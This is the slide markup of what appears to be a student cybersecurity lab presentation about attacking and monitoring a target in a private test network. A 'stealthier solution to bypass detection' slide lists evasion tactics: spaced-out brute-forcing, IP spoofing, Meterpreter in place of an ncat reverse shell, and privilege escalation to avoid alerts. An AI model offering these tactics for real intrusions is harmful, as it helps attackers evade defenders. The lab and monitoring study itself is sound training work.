                <a:srgbClr val="DB0000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="540303"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="71438" dist="171450" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8044" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr sz="11000" b="1">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0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7346525" y="5701200"/>
            <a:ext cx="9684600" cy="2313600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB0000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="540303"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:effectLst>
            <a:outerShdw blurRad="71438" dist="171450" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network Topology &amp;</a:t>
            </a:r>
            <a:endParaRPr sz="7000" b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="11000" b="1">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7"/>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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Monitoring overview Target 2 </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Google Shape;416;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30</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Google Shape;417;p47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101575" y="2021450"/>
            <a:ext cx="22174500" cy="2244300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2100"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800"/>
              <a:t>Kibana has indicated the metric changes during the attack on Target 2, which included the increase in memory usage on Target 2, revealed the IP of an attacking VM, and identified the vulnerable Apache server.</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="Google Shape;418;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1241675" y="4143600"/>
            <a:ext cx="7491775" cy="4937550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="1980000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="419" name="Google Shape;419;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9459225" y="4143600"/>
            <a:ext cx="7311383" cy="4937550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="1980000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="420" name="Google Shape;420;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17191575" y="4143600"/>
            <a:ext cx="6759413" cy="4937550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="1980000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="421" name="Google Shape;421;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16459225" y="9380637"/>
            <a:ext cx="7491775" cy="3916700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="1980000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="422" name="Google Shape;422;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101575" y="9879225"/>
            <a:ext cx="14944550" cy="2919525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="1980000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41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19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41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20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42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22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="422"/>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21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="10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8"/>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7000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Stealthier Solution to bypass detection</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;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31</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="430" name="Google Shape;430;p4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68850" y="8213975"/>
            <a:ext cx="21973600" cy="4432250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="200025" dist="114300" dir="4200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168850" y="2210075"/>
            <a:ext cx="5083800" cy="5217000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD966"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="2580000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Spacing out the brute-force attempts that would make attack less detectable</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6928450" y="2210088"/>
            <a:ext cx="5083800" cy="5217000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD966"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="2580000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>IP spoofing techniques so that the traffic appears to be from within the network</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12493550" y="2210088"/>
            <a:ext cx="5083800" cy="5217000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD966"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="2580000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Use alternatives to ncat reverse shell such as Meterpreter which is difficult to detect. It runs entirely in memory, and encrypts all communication. </a:t>
            </a:r>
            <a:endParaRPr sz="3800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18058650" y="2210088"/>
            <a:ext cx="5083800" cy="5217000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20833"/>
              <a:gd name="adj2" fmla="val 62500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD966"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="342900" dist="95250" dir="2580000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Escalating privileges before access to database that would prevent the alert from being triggered</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43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33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="433"/>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34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="434"/>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30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23"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32</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="441" name="Google Shape;441;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3575"/>
            <a:ext cx="24377650" cy="1371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subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18847700" y="2427925"/>
            <a:ext cx="4800600" cy="10092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Address Range: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
